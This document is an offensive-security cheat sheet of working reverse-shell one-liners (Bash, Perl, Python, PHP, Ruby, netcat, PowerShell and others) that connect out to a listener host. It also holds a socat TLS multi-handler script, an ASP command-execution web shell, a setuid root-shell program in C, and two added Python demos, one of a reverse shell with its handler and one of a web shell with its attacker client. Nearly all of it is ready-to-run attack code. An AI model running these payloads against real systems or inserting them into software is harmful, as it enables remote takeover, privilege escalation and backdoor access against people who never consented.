REVERSE SHELLS

Reverse Shells

Bash

bash -i >& /dev/tcp/10.0.0.1/8080 0>&1


Socat

On Attack Machine:

  socat file:`tty`,raw,echo=0 tcp-listen:4444 

On Target Machine:

  socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444  


Socat can be set up like Metasploit's multi/handler: a TLS listener that stays up, accepts any number of callbacks, and hands each one its own tmux window. Carry out the following steps.

1.) Create a self-signed TLS certificate if you do not already have one (socat wants key and cert in one PEM file).

openssl req -newkey rsa:2048 -nodes -keyout server.key -x509 -days 30 -out server.crt


cat server.key server.crt > server.pem

2.) Now create the script that socat runs on each incoming connection (save it as socatscript.sh and chmod +x it). The script opens a tmux window running a socat that copies between a UNIX domain socket and stdio (the operator's terminal inside tmux), then execs a second socat that bridges the incoming connection's stdio to that UNIX domain socket.

#!/bin/bash
# Run by socat for every accepted connection: our stdin/stdout are the TLS socket.

SOCKDIR=$(mktemp -d)          # mktemp -d creates the directory mode 0700
SOCKF=${SOCKDIR}/usock

# Start tmux, if needed, and make sure a session exists for new-window to target
tmux start-server
tmux has-session -t shells 2>/dev/null || tmux new-session -d -s shells
# Create window: its socat serves the UNIX socket to the operator's terminal
tmux new-window -t shells "socat UNIX-LISTEN:${SOCKF},umask=0077 STDIO"
# Wait for socket
while test ! -e "${SOCKF}" ; do sleep 1 ; done
# Use socat to ship data between the unix socket and STDIO (the target's connection).
exec socat STDIO UNIX-CONNECT:"${SOCKF}"

3.) Launch the Socat listener. fork gives every connection its own copy of the script, so each target that calls back lands in its own tmux window; verify=0 means the listener does not ask the target for a client certificate. The target connects back with socat's OPENSSL: address (verify=0 there too when the certificate is self-signed) and the same exec:'bash -li',pty,stderr,setsid,sigint,sane options used above.

socat OPENSSL-LISTEN:8443,cert=server.pem,reuseaddr,verify=0,fork EXEC:./socatscript.sh


Perl

perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'



Python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
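The one-liner above is only half of the exchange; the other half is the listener (nc -lvnp <port>) on the attack machine. The following is an added example, not code from the original page: it runs the same mechanism end to end on loopback, with the handler side written out, so you can see what the shell actually sends back and why half-closing the socket ends the session. It assumes Linux or macOS with /bin/sh. The payload keeps the page's mechanism (the shell's stdin, stdout and stderr are the socket) but hands the socket fd to Popen instead of calling os.dup2 on the current process, so running the demo does not replace this interpreter's own stdio.

```python
"""Added example (not from the page): the Python reverse shell above, exercised
end to end on 127.0.0.1 together with the handler that normally runs as
`nc -lvnp <port>` on the attack machine."""
import socket
import subprocess


def launch_payload(host: str, port: int) -> subprocess.Popen:
    """Target side. Equivalent to the one-liner's
    os.dup2(s.fileno(), 0/1/2); subprocess.call(["/bin/sh", "-i"])
    but scoped to the child process instead of the current one."""
    s = socket.create_connection((host, port))
    fd = s.fileno()
    # Popen dup2()s the given fd onto 0, 1 and 2 inside the child before exec.
    proc = subprocess.Popen(["/bin/sh", "-i"], stdin=fd, stdout=fd, stderr=fd)
    s.close()  # the child holds its own reference; the parent does not need one
    return proc


def handler_session(commands: str, timeout: float = 10.0) -> str:
    """Attack side: listen on a free loopback port, accept the shell, feed it
    `commands`, half-close the socket so the shell exits on EOF, and return
    everything it sent back (sh -i prompts included: they go to stderr, which
    is the same socket)."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))  # port 0: the kernel picks a free port
    listener.listen(1)
    port = listener.getsockname()[1]

    proc = launch_payload("127.0.0.1", port)  # in the field this is the target
    conn, _ = listener.accept()
    listener.close()
    conn.settimeout(timeout)

    conn.sendall(commands.encode() + b"\n")
    conn.shutdown(socket.SHUT_WR)  # EOF on the shell's stdin -> it exits when done

    chunks = []
    try:
        while True:
            data = conn.recv(4096)
            if not data:  # shell exited and its copy of the socket closed
                break
            chunks.append(data)
    except socket.timeout:
        pass  # shell still busy: return what arrived so far
    finally:
        conn.close()
        try:
            proc.wait(timeout=timeout)
        except subprocess.TimeoutExpired:
            proc.kill()
    return b"".join(chunks).decode(errors="replace")


if __name__ == "__main__":
    print(handler_session("id; uname -a"))
```

Because the shell's stdin is a socket rather than a pty, there is no job control, no line editing and no signal delivery (Ctrl-C goes nowhere); that is the reason the socat variant above uses pty,stderr,setsid,sigint,sane, and why a raw shell is normally upgraded with a pty before use.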



PHP

php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

The <&3 redirections assume the socket is the first descriptor php opened after stdin, stdout and stderr; if something else is already open on fd 3 (common under a web server), bump the number.



Ruby

ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'



Netcat

nc -e /bin/sh 10.0.0.1 1234

The -e option needs a netcat built with it (nc.traditional, ncat); the OpenBSD netcat shipped by most Debian-based systems lacks it, which is what the fifo form below is for.

OR

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f



Java (Groovy syntax, e.g. a Jenkins script console)

r = Runtime.getRuntime()

p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])

p.waitFor()



Shell Pop

shellpop --reverse --number 5 --host <interface> --port <port>



Open SSL

openssl.exe s_client -quiet -connect <ip>:<port1> | cmd.exe | openssl.exe s_client -quiet -connect <ip>:<port2>

Two TLS connections: the first carries commands into cmd.exe, the second carries cmd.exe's output back, so the attack machine needs an openssl s_server listener on each port. -quiet keeps the handshake chatter out of both streams.



PowerCat

https://github.com/besimorhino/powercat

Basic Listener:
   powercat -l -p 8000

Serve a cmd Shell:
   powercat -l -p 443 -e cmd
Send a cmd Shell:
   powercat -c 10.1.1.1 -p 443 -e cmd
Serve a shell which executes powershell commands:
   powercat -l -p 443 -ep


PowerShell

$client = New-Object System.Net.Sockets.TCPClient("<ip>",<port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()



xTerm

xterm -display 10.0.0.1:1

The xterm runs on the target but draws on the attacker's screen, so the attack machine must have an X server listening on display :1 (TCP port 6001) that accepts the target, e.g. Xnest :1 plus xhost +<target ip>.


=====================

WEB SHELLS

=====================

ASPX

<%response.write CreateObject("WScript.Shell").Exec(Request.QueryString("cmd")).StdOut.Readall()%>

This one-liner is classic ASP (VBScript) syntax: save it as a .asp page and call it with ?cmd=whoami. Only StdOut is returned, so append 2>&1 inside the cmd parameter to see errors. An .aspx page needs the C# equivalent built on System.Diagnostics.Process.
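To make the request/response shape of that web shell concrete without an IIS box, here is an added example (not the page's code): a loopback emulation of the query-string shell above in Python's http.server, plus run_cmd(), the attacker-side client that is otherwise a curl call. The server reproduces the one-liner's behaviour, including the fact that only stdout comes back. It assumes a POSIX /bin/sh behind shell=True; the path /cmd.asp is a stand-in name.

```python
"""Added example (not from the page): loopback emulation of the
?cmd= web shell above and the client loop used to drive it."""
import subprocess
import threading
from http.client import HTTPConnection
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, urlencode, urlparse


class WebShellHandler(BaseHTTPRequestHandler):
    """Server side: behaves like Exec(Request.QueryString("cmd")).StdOut.ReadAll()."""

    def do_GET(self):
        query = parse_qs(urlparse(self.path).query)
        cmd = query.get("cmd", [""])[0]
        if not cmd:
            self.send_response(400)
            self.end_headers()
            return
        # shell=True is the analogue of WScript.Shell.Exec: the parameter is a
        # whole command line, interpreted by the system shell.
        result = subprocess.run(cmd, shell=True, capture_output=True, timeout=10)
        body = result.stdout  # StdOut.ReadAll(): stderr is NOT returned by the one-liner
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):
        pass  # keep the demo quiet


def start_webshell():
    """Serve the emulated shell on a free loopback port; returns (server, port)."""
    server = HTTPServer(("127.0.0.1", 0), WebShellHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, server.server_address[1]


def run_cmd(port: int, cmd: str, host: str = "127.0.0.1") -> str:
    """Attacker side: GET /cmd.asp?cmd=<url-encoded command>; the body is the output."""
    conn = HTTPConnection(host, port, timeout=15)
    conn.request("GET", "/cmd.asp?" + urlencode({"cmd": cmd}))
    resp = conn.getresponse()
    body = resp.read().decode(errors="replace")
    conn.close()
    return body


if __name__ == "__main__":
    server, port = start_webshell()
    try:
        for c in ("id", "uname -a", "ls /nonexistent 2>&1"):
            print("$ " + c)
            print(run_cmd(port, c), end="")
    finally:
        server.shutdown()
        server.server_close()
```

Each command is a separate stateless request: no working directory or environment survives between calls, which is why web shells are usually used only to fetch and launch one of the reverse shells above.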



ASP

CMD.asp



p0wny

p0wny_shell



DLL Shell

dll.cpp



ShellPop

ShellPop



Set UID Shell

#include <stdlib.h>
#include <unistd.h>

/* Compile, chown root, chmod u+s. setuid(geteuid()) copies the file owner's
   uid into the real uid, otherwise bash drops the effective privilege. */
int main(void)
{
  setgid(getegid());   /* same for the group, if the binary is setgid */
  setuid(geteuid());
  system("/bin/bash");
  return 0;
}